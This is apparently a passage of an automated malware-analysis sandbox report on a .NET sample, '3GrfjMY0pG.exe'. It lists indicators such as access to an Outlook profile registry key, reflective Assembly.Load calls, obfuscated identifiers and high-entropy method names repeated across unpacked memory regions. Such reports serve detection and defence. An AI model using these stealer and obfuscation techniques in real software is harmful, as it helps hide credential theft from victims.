                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 3GrfjMY0pG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 3GrfjMY0pG.exeStatic file information: File size 1054720 > 1048576
                Source: 3GrfjMY0pG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 3GrfjMY0pG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Windows.Forms.pdb source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Jmdv.pdbSHA2560y* source: 3GrfjMY0pG.exe
                Source: Binary string: Jmdv.pdb source: 3GrfjMY0pG.exe

                Data Obfuscation

                barindex
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
                Source: 0.2.3GrfjMY0pG.exe.43d80a8.1.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
                Source: 0.2.3GrfjMY0pG.exe.59c0000.6.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
                Source: 0.2.3GrfjMY0pG.exe.43b8088.3.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01479C30 push esp; retf 017Bh5_2_01479D55
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147891E pushad ; iretd 5_2_0147891F
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01478DDF push esp; iretd 5_2_01478DE0
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_0147BDA5 pushfd ; ret 5_2_0147BDAA
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_01478C2F pushfd ; iretd 5_2_01478C30
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeCode function: 5_2_06C99241 push es; ret 5_2_06C99244
                Source: 3GrfjMY0pG.exeStatic PE information: section name: .text entropy: 7.820818630540199
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, ynfd59DTnk0P8IUUim.csHigh entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, OVbtgef29TOIYVcr1P.csHigh entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, hJig8h0WZikgbJwFOu.csHigh entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, kedsymiHwR9IZl9Rpl.csHigh entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, QMS5wJSpvkKerolDJ1.csHigh entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, rtUpFMWDBEDy9V0EA9v.csHigh entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, QS84t6WHerZ6peZei3s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, oG17jiWWq4NBFriJ2sN.csHigh entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, iCyBrjAQ0K85ZxmtDg.csHigh entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, dynp2dHAyXLHRUbXBm.csHigh entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, CiqvKlplBI3tKjcx8Y.csHigh entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.csHigh entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, mgDE1gRRmkiAifKFan.csHigh entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, bPA6G0Kn1bOXlAplBO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LuU7TjJm9sXp1wJX8A.csHigh entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, xBHHG6XsKDbNNLtgdy.csHigh entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.csHigh entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, tsKFQRyS8x1tRqYrqR.csHigh entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, Rnlu3s8n8UKbY8UFJb.csHigh entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, uvatpAIBg4sIxQSbeU.csHigh entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, geRufZzvwFwWKwr4Qj.csHigh entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, XBqFKCC6Y5jjqc6xvG.csHigh entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
                Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, nAVng69YPviXSp80Uh.csHigh entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, ynfd59DTnk0P8IUUim.csHigh entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, OVbtgef29TOIYVcr1P.csHigh entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, hJig8h0WZikgbJwFOu.csHigh entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, kedsymiHwR9IZl9Rpl.csHigh entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, QMS5wJSpvkKerolDJ1.csHigh entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, rtUpFMWDBEDy9V0EA9v.csHigh entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, QS84t6WHerZ6peZei3s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, oG17jiWWq4NBFriJ2sN.csHigh entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, iCyBrjAQ0K85ZxmtDg.csHigh entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, dynp2dHAyXLHRUbXBm.csHigh entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, CiqvKlplBI3tKjcx8Y.csHigh entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.csHigh entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, mgDE1gRRmkiAifKFan.csHigh entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, bPA6G0Kn1bOXlAplBO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LuU7TjJm9sXp1wJX8A.csHigh entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, xBHHG6XsKDbNNLtgdy.csHigh entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, LnVnXikr7pD1OyDJ5H.csHigh entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, tsKFQRyS8x1tRqYrqR.csHigh entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, Rnlu3s8n8UKbY8UFJb.csHigh entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, uvatpAIBg4sIxQSbeU.csHigh entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, geRufZzvwFwWKwr4Qj.csHigh entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, XBqFKCC6Y5jjqc6xvG.csHigh entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
                Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, nAVng69YPviXSp80Uh.csHigh entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, ynfd59DTnk0P8IUUim.csHigh entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, OVbtgef29TOIYVcr1P.csHigh entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, hJig8h0WZikgbJwFOu.csHigh entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, kedsymiHwR9IZl9Rpl.csHigh entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, QMS5wJSpvkKerolDJ1.csHigh entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, rtUpFMWDBEDy9V0EA9v.csHigh entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, QS84t6WHerZ6peZei3s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, oG17jiWWq4NBFriJ2sN.csHigh entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, iCyBrjAQ0K85ZxmtDg.csHigh entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, dynp2dHAyXLHRUbXBm.csHigh entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, CiqvKlplBI3tKjcx8Y.csHigh entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.csHigh entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, mgDE1gRRmkiAifKFan.csHigh entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, bPA6G0Kn1bOXlAplBO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LuU7TjJm9sXp1wJX8A.csHigh entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, xBHHG6XsKDbNNLtgdy.csHigh entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, LnVnXikr7pD1OyDJ5H.csHigh entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
